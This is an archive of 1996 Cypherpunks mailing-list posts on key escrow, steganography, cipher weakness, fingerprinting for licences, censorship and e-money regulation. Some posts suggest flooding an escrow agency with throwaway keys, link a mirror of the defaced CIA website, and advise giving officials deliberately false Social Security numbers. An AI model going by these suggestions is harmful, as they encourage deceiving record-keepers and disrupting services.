Sep 19 15:27:00 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 20 Sep 1996 06:27:00 +0800 Subject: monkey-wrenching GAK In-Reply-To: <199609182148.WAA00346@server.test.net> Message-ID: On Wed, 18 Sep 1996, Adam Back wrote: > 3) Monkey-wrenching > > Even with GAK, where you are forced to give the government the keys, > you can do much to make the job of administering GAK very expensive. > You start by ensuring that the government can not get your encrypted > data (the other half of the secret share), so that the key is of no > use :-) Another thing you can do: generate huge key pairs all day long and submit them to the NSA. If enough people do this, they will be flooded and overworked, of course they may ignore them, etc, or make it hard to do so, but if everyone generates a 4K key every hour or two and discards it, but gives the key pair to the NSA anyway, they will run out of storage space, or at least it will make it much much harder for them to figgure out which key you are using for conversation X. You can also generate a lot of /dev/null traffic by sending encrypted random garbage through remailers signed and encrypted with those random discard keys - apparently to yourself - but instruct the xth remailer in the chain to just drop it. Make it hard for them to know which of your 10000 keys is the one you truly use. :) This assumes many many things: like you are allowed to generate your own key, you are allowed to make the submissions electronically to the NSA, etc, so caveat emptors are all over the place here. :) Still, it's one suggestion. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From minow at apple.com Thu Sep 19 15:38:21 1996 From: minow at apple.com (Martin Minow) Date: Fri, 20 Sep 1996 06:38:21 +0800 Subject: GAK, GAP, GAY In-Reply-To: <199609190117.SAA04924@netcom21.netcom.com> Message-ID: > (The Swedish Post is currently >spending a lot of money advertising their new Web services. For >full access to such sensitive data as detailed wheather maps you >have to enter your name, address and Person Number - for credit >information, they say - and they will send you, by snail mail, a >username and password; http://www.torget.se) Actually, they say they'll send it by Registered Mail - so there is an "authenticated" binding between userID and person. (MIT did this for accounts on MIT-AI about 20 years ago.) They will also send a copy of your Swedish credit report. Since the Swedish Post is planning to get into offering services for a fee, their requirement for a means of payment seems reasonable, though I would have thought that a Visa number would be sufficient. They refused my application without sending a copy of my credit report (and without explanation), even though I provided them with my valid Swedish personal number. I may complain in person next week when I'm in Stockholm for vacation, though it seems like a dumb way to spend a vacation. Martin. From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 15:45:09 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 06:45:09 +0800 Subject: More proposals for European censorship Message-ID: <01I9O2D1BGCO8Y4ZFQ@mbcl.rutgers.edu> Fortunately, the European Parliament really doesn't have much power. I'd point out to those squeamish about child pornography that - aside from that it's the production that's the problem, not the transmission & duplication - what can be used to censor it can be used to censor everything else. Incidentally, what nonsense is meant by "social rights"? -Allen > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > EU PARLIAMENT DEMANDS ACTION ON CHILD SEX > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > STRASBOURG, France (Sep 19, 1996 11:24 a.m. EDT) - The European > Parliament pressed the European Union on Thursday to act to curb child > sex and trafficking rings, saying the fight against sexual abuse of > children must be an "absolute priority." [...] > Euro-MPs also called for action to stop criminals using the Internet > to disseminate pornography and to deal in women and children. They > urged the European Commission to look into technical and legal > measures, at European and global level, to combat the use of the > information superhighway for criminal purposes. > They said a strong regulatory framework for controlling the networks > was needed to ensure that people's personal and social rights were > enhanced by the advent of the new technology. [...] > Copyright © 1996 Nando.net From Mullen.Patrick at mail.ndhm.gtegsc.com Thu Sep 19 15:49:14 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Fri, 20 Sep 1996 06:49:14 +0800 Subject: Stego inside encryption Message-ID: My apologies if this shows up twice. I got an error message from my first posting. *************** I know a lot of times the idea behind steganography is to hide the fact that a secret message is in a seemingly normal file/mail/whatever. This is good for avoiding unwanted interest in your file. The benefit of not having people attempt to crack you code, added to the strength of the cryptosystem is wonderful. However, I propose this-- Don't hide that anything's encrypted! Rather than hide this fact, throw it in their face! I propose hiding an encrypted message inside another encrypted message. Set bits in specific places to data in the real message. The benefit is Oscar not only doesn't know what the crypto is, he attacks the wrong message. Hiding statistically random bits from the true message in statistically random bits from the masking message shouldn't be too hard. Granted, this scheme doesn't get you past measures designed to keep out all encrypted messages, and it surely wouldn't keep you message from generating interest, but it would be very hard to decrypt the message, especially when some algorithm is used which (seemingly) randomly selects which bits to use for the stego. Just a thought... My apologies if someone has already proposed this method. Patrick From perry at piermont.com Thu Sep 19 15:51:33 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 20 Sep 1996 06:51:33 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building In-Reply-To: <01BBA60C.5AD5CCC0@misd145.cern.ch> Message-ID: <199609191753.NAA21446@jekyll.piermont.com> Batman writes: > For the 200th time, unsubscrive me of your fucked mail lists. Never. I will *never* unsubscrive you from anything. From bkmarsh at feist.com Thu Sep 19 15:54:07 1996 From: bkmarsh at feist.com (Bruce M.) Date: Fri, 20 Sep 1996 06:54:07 +0800 Subject: your mail In-Reply-To: <199609191230.FAA09141@sirius.infonex.com> Message-ID: On Thu, 19 Sep 1996, Mixmaster wrote: > "Drivers Must Allow Fingerprinting" > "'I have grave concerns,' she said. 'When we think of giving a fingerprint, > we think of being arrested. We feel like we've done something wrong, > not because we are complying with the law and are doing something > right.' > "There will be no exceptions to the fingerprint requirement..., Wright said, > adding that 'having a driver's license is a privilege,' not a right. I always find it ironic when government representatives such as this individual feel that they can put on an air of superiority by saying that we, the public, are privledged to be able to do something at all. Apparently they forget that not only are we the reason they have a job, but we're the reason for government, period. > "Wright said...the fingerprints eventually will be available to other law > enforcement agencies and courts.... Of course! Along with our escrowed encryption keys and 'classified' dossiers. ________________________________ [ Bruce M. - Feist Systems, Inc. ] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 'DISA information shows that computer attacks on the Department of Defense are successful 65 percent of the time. The DoD, despite its problems, probably has one of the strongest computer security programs in government.' -GAO/T-AIMD-96-108 From attila at primenet.com Thu Sep 19 15:57:08 1996 From: attila at primenet.com (attila) Date: Fri, 20 Sep 1996 06:57:08 +0800 Subject: The periodic caveat about Timmy May In-Reply-To: <199609190517.HAA00851@basement.replay.com> Message-ID: <199609191920.NAA00823@InfoWest.COM> In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 at 07:17 AM, nobody at flame.alias.net (Anonymous) said: Timmy May habitually digs into his cesspool of a mind for his mailing list fertilizer. this is humour. it tickles the imagination, and the reference to tim is lost! From perry at piermont.com Thu Sep 19 16:05:30 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 20 Sep 1996 07:05:30 +0800 Subject: unscribe cypherpunks@toad.com In-Reply-To: Message-ID: <199609191939.PAA21770@jekyll.piermont.com> Steve Dyson writes: > unscribe cypherpunks at toad.com Never. From perry at piermont.com Thu Sep 19 16:29:52 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 20 Sep 1996 07:29:52 +0800 Subject: Cypherpunks is dead anyway... (was Cypherpunk Enquirer) In-Reply-To: <199609190441.AAA12078@dhp.com> Message-ID: <199609191739.NAA21396@jekyll.piermont.com> The Enquirer wrote... > Scientists flocked to toad.com recently in response to the first > authenticated sighting of a Perrygram in months. The Perrygram, > only recently thought extinct, was spotted on the cypherpunks > mailing list after an absence of several months. Specialists > speculate that it may have detected the recent list increase in its > favorite food - pure, unadulterated bullshit. In fact, Perrygrams are dead because I've given up on this list. There is no more cryptography discussion going on -- the list is basically a very low grade political rant forum, with most of the rants having no relevance to crypto. (I suppose "I told you so" doesn't help much.) Anyway, as soon as I find a home for Cypherpunks Mark II I'm starting it and unsubscribing from here. Cypherpunks is dead. This happens to all mailing lists eventually. I suppose it had to happen here. (Finding a new list home has been a low priority project for me recently because I've been busy with "real work" -- however, if you run (I emphasize *run*) a well connected site and can handle a list with 1500 subscribers or so, and don't mind a somewhat more restrictive charter than "post anything you like at any time", please get in touch.) Perry From markm at voicenet.com Thu Sep 19 16:31:18 1996 From: markm at voicenet.com (Mark M.) Date: Fri, 20 Sep 1996 07:31:18 +0800 Subject: a simple cypher scheme In-Reply-To: <9609180005.AA14720@ns.tsinet.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 17 Sep 1996, stuart johnson wrote: > i've been on cypherpunks for about a year a half now, and have wacthed > many interesting threads pass by but i've never posited anything. what has > brought me out into the open is this : i work for an engineering firm doing > asic design, i use pgp ( as do all rational persons ), a co-worker here has > come up with a 'cypher' scheme that he would like to use to send code to our > clients. the scheme is this : he would take the file of code and pad all > lines to the length of the longest line, he would then preform column swaps, > and then row swaps, to 'mix up' the file. the person receiving the file > would then preform the opposite functions to recover the file. it seems so > simple that it can't be good. i've convenced him to use pgp, but i would > like some input if possible on why his cypher scheme is not a good one. This is a transposition cipher. The problem with this cipher is that it does not obscure patterns in the plaintext. There is no substitution function in this algorithm. Secure ciphers have several rounds with both a substitution and transposition function. In other words, there is no way this could be secure. Tell your co-worker to stick with triple-DES. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkBsASzIPc7jvyFpAQH6Pwf+Jyla3LZADlkaurIapmusjvR5w1xjZ9Oa 1I90YzyKOUmBVzn4ZYabrc4AW4zDAQL6nCuwxy0mR3Zo5cRHMyQ3r2xCZpizgkPu liJmMvKBOfIv9s5I9+BwE+SwG+Hkp7wEOEyk/t3i1yGzRUTQDj26tZKN4HGQUXt/ ufeCVtHqHIhncak+NEkzlz/VaJ9yMMVWZynp14Ip+S9yB8ztM8LueMp8mCJXSujw I2ajThu3dCgTaeypVPGnHAipLwuGtxsfuNhBkRPb/XCu/mN3ua6aj52Mp6NUwmwv rdy0KMuY6W93m9WX8Z+O89R5zBYX9gY7deq8H9BgJXMyVGkkqPvWMA== =CzZl -----END PGP SIGNATURE----- From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 16:32:35 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 07:32:35 +0800 Subject: Comments on Emoney regulation Message-ID: <01I9O251UAWK8Y4ZFQ@mbcl.rutgers.edu> JYA has the complete version of this, but I wanted to make a comment that this allegedly pro-consumer group is wanting mandatory receipts - decidedly anti-privacy. Typical; Consumer Reports keeps calling for limits on what can be made available instead of making the information available and letting people decide on their own. There is also the problems associated with welfare-on-a-card - namely limits on what can be purchased, a requirement for full identity disclosures, etcetera. I'd call this effort by government also a form of the pressure-by-economics we saw with the initial Clipper proposal (leaving aside the actual agenda), namely using government purchasing to distort the market (away from anonymous digital cash, in this case). The last statement also brings up the question of why shouldn't banks move out of high-crime areas? I'd appreciate lower bank fees, and so would most people. -Allen > _________________________________________________________________ > Centura > _________________________________________________________________ > REGULATORS TURN SPOTLIGHT ON CYBERMONEY > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 N.Y. Times News Service > (Sep 19, 1996 00:41 a.m. EDT) -- As concerns grow about electronic > money-laundering, cybercounterfeiting and bank runs on the Internet, > regulators in the United States and around the world are scurrying to > catch up with the rapid development of electronic money. [...] > Moreover, there is now no requirement that a company that issues > stored-value cards must be a bank or be regulated in any other way. > That raises the question whether these cards, if they become popular, > will become as unruly as the market for prepaid telephone cards, in > which a number of card vendors have failed to deliver the calls that > were promised. [...] > To prevent such problems, a number of other countries have decided to > require that stored-value cards be issued only by banks. > The Federal Reserve has issued proposals on whether the consumer > protections guaranteed for other electronic-funds transfers -- like > direct deposits and debit cards -- will apply to stored-value card > purchases. These protections include the requirement of receipts with > every purchase and a limit on liability if a card is lost or stolen. > The Fed has proposed that card systems that cannot hold more than $100 > and those that have no central records of how much money is on each > card be exempt from the strict consumer-protection rules. > "The Fed proposal is destroying consumer protection," said Janice > Shields, the consumer-research director for the U.S. Public Interest > Research Group in Washington. "They don't want to disclose > error-resolution procedures, and they want unlimited consumer losses." [...] > One force pushing the development of the technology, however, is the > government itself, which has mandated that by 1999 all payments to or > from government accounts must be made electronically. This may have > the most significant effect on the recipients of various welfare > programs, many of whom now do not have bank accounts that could > receive an electronic money transfer. > To deal with this, various groups of state governments are developing > special cards on which benefits payments will be stored. Recipients > will be able to use the cards to withdraw cash at automated teller > machines and to make purchases. > One of the thorniest issues is whether holders of these welfare cards > get the same protections as holders of credit and debit cards issued > by banks. State and local governments do not want to absorb the cost > of issuing refunds, for example, though some readings of the > electronic funds transfer act would require that they do. > Some are also concerned that as banks move more toward offering their > services electronically, they will have more reason to close branches > in inner-city areas. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 16:33:25 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 07:33:25 +0800 Subject: Insider Trading - news report Message-ID: <01I9O2JCWXMK8Y4ZFQ@mbcl.rutgers.edu> I'd be curious as to the comments of Black Unicorn and others on that legal finding - it does appear to make things at least a bit better in this area... including making it difficult to claim that insider information shouldn't be transmitted on the Net. Incidentally, I find AP's calling insider trading "fraud" rather biased. -Allen > _________________________________________________________________ > Direct Media > _________________________________________________________________ > INSIDER TRADING NEVER WENT AWAY > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Associated Press > WASHINGTON (Sep 18, 1996 10:35 a.m. EDT) -- One of the most infamous > acts in the financial fraudster's playbook, insider trading, remains > at record levels, despite a decade of steady crackdowns by regulators. [...] > The SEC brought one of its more unusual insider trading cases on > Monday, when it sued the unnamed account holders in a Swiss and > Bahamian accounts with insider trading ahead of The Gillette Co.'s > merger proposal for Duracell International. [...] > One disturbing development for regulators is a recent decision by the > 8th U.S. Circuit Court of Appeals that struck down one of the SEC's > main enforcement tools in insider trading cases. > The court, which covers several Midwestern states, rejected the > so-called "misappropriation theory" in insider trading cases, which is > used to nab people trading on inside information who don't owe a > fiduciary duty to the company's shareholders. The court also rejected > an SEC rule used to snare insider trading in tender offers. > The 8th Circuit decision came in August in a Justice Department case > against Minneapolis attorney James H. O'Hagan, who was charged with > insider trading during the 1988 takeover bid of Pillsbury Co. by Grand > Metropolitan PLC. SEC General Counsel Richard Walker has asked the > appeals court for a rehearing on the matter. > While the 8th Circuit decision represents a setback for the SEC, the > agency usually brings its cases in the New York and Chicago areas, > where the federal courts acknowledge these insider trading rules. > Regulators say these enforcement tools are important because insider > trading follows few patterns. In an analysis of 35 cases brought in > 1995 that solely dealt with insider trading, Gerlach said 20 involved > trading ahead of mergers, three ahead of other positive corporate > announcements and six ahead of bad corporate news. > He described 16 of the cases as "classic insider trading" involving an > executive, company director or employee who traded on confidential, > market sensitive information or tipped friends about it. Among the > remaining cases, four involved trading by securities brokers or other > industry officials, four involved law firm employees and one, an > employee at an outside accounting firm. > Investigators at the Nasdaq Stock Market's market surveillance unit > refer a significant number of insider trading cases to the SEC. Halley > Milligan, who heads a team of nine insider trading investigators at > Nasdaq, said the market has made 73 referrals on suspected insider > trading to the SEC so far in 1996, which is on par with last year, > when 107 cases were referred to the agency. > Nasdaq, like major stock markets, uses sophisticated computer > technology to sniff out illegal trading. The Nasdaq system is called > SWAT, or Stock Watch Automatic Tracking, which scans news databases > after detecting any unusual trading. [...] > Copyright © 1996 Nando.net From chaos at ilf.net Thu Sep 19 16:39:20 1996 From: chaos at ilf.net (Lord of Entropy) Date: Fri, 20 Sep 1996 07:39:20 +0800 Subject: CIA hacked Message-ID: <3.0b19.32.19960919162956.0071bce0@ilf.net> At 01:11 AM 9/20/96 +1000, you wrote: >+http://www.odci.gov/cia >+Seems the DOJ hack was a good inspiration. Heh! Life's good when you're >+willing to work at it. >Did you or anyone get a mirror of the site?! I wanna set one up! ;) http://www.ilf.net/hacked.websites/cia/ -- T 37 5F 68 3F 0F 1B A3 6B 7F 90 EA 40 73 49 2F B0 R Information Liberation Front U NO http://www.ilf.net/ chaoS at ilf.Net T E From tcmay at got.net Thu Sep 19 16:55:01 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 07:55:01 +0800 Subject: monkey-wrenching GAK Message-ID: At 4:46 PM 9/19/96, Ray Arachelian wrote: >Another thing you can do: generate huge key pairs all day long and submit >them to the NSA. If enough people do this, they will be flooded and >overworked, of course they may ignore them, etc, or make it hard to do >so, but if everyone generates a 4K key every hour or two and discards it, >but gives the key pair to the NSA anyway, they will run out of storage >space, or at least it will make it much much harder for them to figgure >out which key you are using for conversation X. Ah, but what about the _fee_ for registering a key? You really didn't think this would be free, did you? (It costs money to register cars, guns, etc., so why would it be "free" to register a key?) Besides being a revenue enhancement tool, charging a fee stops this sort of flooding attack. (Note: One of my biggest objections to GAK, besides the political/civil rights issue, is what it does to systems which generate lots and lots of keys on an ad hoc, continuing basis. GAK, if enforced, puts a major speed bump in the way and increases costs, possibly making certain kinds of systems infeasible.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From gary at systemics.com Thu Sep 19 16:57:22 1996 From: gary at systemics.com (Gary Howland) Date: Fri, 20 Sep 1996 07:57:22 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <3241B75D.41C67EA6@systemics.com> Timothy C. May wrote: > > (Yes, I disliked being thumb-printed, but I could see no viable > alternative. I'm sure Duncan has some scheme to declare himself a Botswanan > exchange student, but I decided being thumb-printed was the lesser hassle.) Sure, it's always less hassle doing what they want. Privacy doesn't come for free. It's easier to let the police search you in the street than it is to make them arrest you so that you can make a formal complaint. > By the way, the next rev of the California driver's license will reportedly > have one's *Social Security Number* printed on the card! So much for the > statement clearly printed on my card: > > "For social security and tax purposes -- not for identification." So? My passport reads "let the bearer travel without let or hindrance" - yet I still get enormous grief every time I enter the country that issued it. > Paraphrasing that famous quote, just which part of "not for identification" > don't they understand? Hmm - who are you paraphrasing here? (Just curious). > (Indeed, I am asked for my SSN in many places. A few times I've refused to > give it. Once the clerk just said, "Fine, I have it here on my computer > anyway." Refusing to give it is probably no longer meaningful, due to > massively cross-linked data bases.) > > Again, we desperately need an infrastructure of "credentials without identity." Or widespread disinformation - don't stand up for your "right" not to disclose your SSN - simply give them one with errors in - that way their whole database starts to lose value. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From felipe at xs4all.nl Thu Sep 19 17:23:57 1996 From: felipe at xs4all.nl (Felipe Rodriquez) Date: Fri, 20 Sep 1996 08:23:57 +0800 Subject: Declaration against German censorship Message-ID: <199609181150.NAA18038@xs1.xs4all.nl> Send a mail to tuamotu at duplox.wz-berlin.de to sign this declaration against current German censorship and IP-filtering of sites. ------------------------------------------------------------------ A Letter of Protest On August 30th 1996, the German Federal Prosecutor wrote to German Internet providers and on-line services telling them that they could possibly be charged with aiding and abetting persons who are currently the subject of a preliminary inquiry by the German Federal Prosecutor due to an article published in a magazine which offended German anti-terrorism laws. The German Federal Prosecutor wrote (excerpt): "Under the following Internet addresses ... [the GFP names two WWW sites, which will be not quoted here because we do not refer to the actual case of a specific text which gives cause for complaint, instead we are interested in the act of censorship as such] ..the complete issue is available... [of the magazine who is subject of preliminary inquiry by the GFP. The GFP explains why they deem the text to be illegal in Germany]... We want you to be aware that you are possibly making yourself liable to prosecution by acting as an accessory to criminal offences [according to German anti-terrorist laws '' 129a,3 and 130a,1 StGB] if you allow the text to be accessed via your Internet dial-ins and host computers." Although the German Federal Prosecutor merely pointed out the possibility of being liable to prosecution and although the opinion of the GFP as expressed in the letter has not as of yet been proven right by a court decision, several German providers responded to the letter by temporarily (for no longer than 28 days) closing off the WWW sites where the electronic version of the article was previously available to Internet readers. From the point of view of a WWW site, for example xs4all.nl in the Netherlands, the action of German providers (among them the largest German providers) means a blockage of all of their WWW information for a great number of German netizens because of a single web page among the thousands of pages xs4all offers at their site. We think denying access to WWW sites is wrong. Beside the fact that it is practically impossible to filter the flow of data in order to keep specific WWW pages which are stored on WWW sites in other countries outside of the German state territory when Germans are allowed to contact these countries by phone for example - unless the German government decided upon massive censorship measurements which would be not according to German Laws as they are today - we demand equal rights for Internet providers and TelCo providers, thus making the GFP's letter unsubstantiated if equal rights were applied. So far, neither German Telecom nor the German postal service have been liable to prosecution by acting as assessories to criminal offences by simply transporting telephone or mail data. xs4all and xs2all Internet Information! back to the letter of protest in german language Internet Information (available in English, Dutch, German): http://www.xs4all.nl/~felipe/germany.html --- latest news Internet Information in German language http://www.spiegel.de/aktuell/sonv0296370906.html http://www.nadir.org/NA/Text/Archiv/Medien/Zeitschriften/radikal/netzzensur/ http://www.anwalt.de/ictf/mirror From deviant at pooh-corner.com Thu Sep 19 17:29:26 1996 From: deviant at pooh-corner.com (The Deviant) Date: Fri, 20 Sep 1996 08:29:26 +0800 Subject: All Bets Off In-Reply-To: Message-ID: On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote: > Date: Thu, 19 Sep 1996 11:30:32 -0400 > From: Daniel Christopher Miskell > To: Rabid Wombat > Cc: cypherpunks at toad.com > Subject: Re: All Bets Off > > >On Tue, 17 Sep 1996, Jeff Davis wrote: > > [lots of quoting rm'd] > > Tom Clancy is not a military-hired brain, but to make his novels realistic and > to do justice to the people he portrays, he does a LOT of research. He is a > highly respected author, and I have no doubt that his statement is based on > his personal findings, collected for a previous novel. > I beleive he was also a Capain in the Navy... --Deviant Old MacDonald had an agricultural real estate tax abatement. From dlv at bwalk.dm.com Thu Sep 19 18:03:02 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 20 Sep 1996 09:03:02 +0800 Subject: CIA hacked In-Reply-To: <199609191719.TAA28972@spoof.bart.nl> Message-ID: >From remailer at mailhub.bart.nl Thu Sep 19 13:18:03 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Thu, 19 Sep 96 16:10:20 EDT for dlv Received: from spoof.bART.nl by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA03960 for dlv at bwalk.dm.com; Thu, 19 Sep 96 13:18:03 -0400 Received: (from remailer at localhost) by spoof.bart.nl (8.7.5/8.6.8) id TAA28972 for dlv at bwalk.dm.com; Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) Date: Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) Message-Id: <199609191719.TAA28972 at spoof.bart.nl> To: dlv at bwalk.dm.com From: remailer at 2005.bart.nl (Anonymous) Comments: Please report misuse of this automated remailing service to The contents of this message are neither approved or condoned by nl.com or our host bART Internet. *** Replying to it will not send your reply to the sender *** There is no way to determine the originator of this message. If you wish to be blocked from receiving all anonymous mail, send your request to the mailing list. The operator of this particular remailer can be reached at Subject: Re: CIA hacked Return-Path: To: cypherpunks at toad.com Subject: Re: CIA hacked From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Thu, 19 Sep 96 08:08:39 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com Mike van der Merwe writes: > I'm sure we will find out in a few years that Microsoft invented the > Net. Or brought it to the masses. Or saved it from a certain and > early demise. Or all of the above. > JAMES SEYMOUR >Dr. John M. Grubor created the 'net. Who created you? You tub of shit? From tcmay at got.net Thu Sep 19 18:08:23 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 09:08:23 +0800 Subject: DL in exchange for fingerprint Message-ID: At 9:13 PM 9/19/96, Gary Howland wrote: >Timothy C. May wrote: >> >> (Yes, I disliked being thumb-printed, but I could see no viable >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan >> exchange student, but I decided being thumb-printed was the lesser hassle.) > >Sure, it's always less hassle doing what they want. Privacy doesn't >come for free. It's easier to let the police search you in the street >than it is to make them arrest you so that you can make a formal >complaint. So, just what it is _your_ method of dealing with this? While it is noble to talk about fighting the system, just how do you go about doing it yourself? Do you simply drive without a valid driver's license? I know some folks who do, of course, but it's not something that's "worth it" to me. (This space reserved for your lecture about how I need to be prepared to go to jail to defend my right not to be thumbprinted, etc. On second thought, why don't you be the one to go to jail, and then you can let us know your experiences.) >> Paraphrasing that famous quote, just which part of "not for identification" >> don't they understand? > >Hmm - who are you paraphrasing here? (Just curious). "What part of "No" don't you understand?" and "What part of "Congress shall make no law" don't you understand?" --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From steve at tsearch.com Thu Sep 19 18:17:13 1996 From: steve at tsearch.com (Steve Dyson) Date: Fri, 20 Sep 1996 09:17:13 +0800 Subject: unscribe cypherpunks@toad.com Message-ID: unscribe cypherpunks at toad.com ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Steve Dyson Technology Search International Consultant 25 Metro Drive, STE 238 steve at tsearch.com San Jose, CA 95110 VOICE 408.437.9500 FAX 408.437.1033 "...dockin-doid, dockin-doid.........dockin- doid" ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] From sunder at brainlink.com Thu Sep 19 18:40:50 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 20 Sep 1996 09:40:50 +0800 Subject: Stego inside encryption In-Reply-To: Message-ID: On 19 Sep 1996, Mullen Patrick wrote: > To take this one step further, has anyone tried to ever use this method as > an encryption method? You could hide data in a stream of random bits, using > position as the encryption method. Obviously, the data would not be stored > in packets; rather as single bits strewn throughout the stream. Even ASCII > characters could be hidden in such a system very well, as the possibility of > choosing the correct 8 bits (extended char set) from the data stream when > any combination has equal potential of being the correct sequence would be > extremely difficult. Error checking/correcting code could even be used. > > Using this system, the placement algorithm would be the focus of attack. If > an algorithm which has a sufficiently random placement was used, extracting > the correct bits would be difficult. Another way to increase the security > would be to hide the correct message inside a bitstream created by using > the same method on other similar messages. (Hiding a real message inside > bogus messages. Hmm... Which one's real?) I've written something similar to this idea a few years ago. :) You might want to check it out. Do a net search for WNS210.ZIP at your nearest good crypto ftp site. You might want to try ftp.wimsey.ca. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From rah at shipwright.com Thu Sep 19 19:04:56 1996 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 20 Sep 1996 10:04:56 +0800 Subject: Clickshare launches Internet's first multi-site micropaymentsservice Message-ID: --- begin forwarded text Date: Thu, 19 Sep 1996 12:16:39 -0400 (EDT) Mime-Version: 1.0 To: "mpay list (MIT)" From: felixk at panix.com (Felix Kramer) Subject: Clickshare launches Internet's first multi-site micropayments service Sender: owner-micropay at ai.mit.edu Precedence: bulk Reply-To: micropay at ai.mit.edu Here are the first paragraphs of a press release, the rest of which can be found at: http://www.clickshare.com/pubpack/releases.html Clickshare launches Internet's first multi-site micropayments service "Internet Information Utility" delivers commerce a la carte WILLIAMSTOWN, Mass., Sept. 16 -- Clickshare Corporation's pioneering multi-site, single-ID, Internet micropayment system went live on Friday as users began clicking on -- and paying for -- information online. Purchases from Friday to Sunday by over a dozen first registrants totaled $62.60. "We're the web's first working multi-site distributed user-management and micropayment service," said Bill Densmore, Clickshare's chairman. "Now publishers can charge for valuable information on the Internet, rather than giving it away." "Now that 'The Internet's Information Utility' (sm) is up and running," said Felix Kramer, Clickshare marketing director, "we'll finally see whether people will buy information by the click." -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- Felix Kramer, Marketing Director CLICKSHARE CORP. felix at clickshare.com Direct: 212/866-4864 www.clickshare.com Corporate: 413/458-8001 www.nlightning.com (personal) fax: 212/866-5527 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From Tunny at inference.com Thu Sep 19 19:08:39 1996 From: Tunny at inference.com (James A. Tunnicliffe) Date: Fri, 20 Sep 1996 10:08:39 +0800 Subject: Private key server Message-ID: Gary Howland[SMTP:gary at systemics.com] wrote: f_estema at alcor.concordia.ca 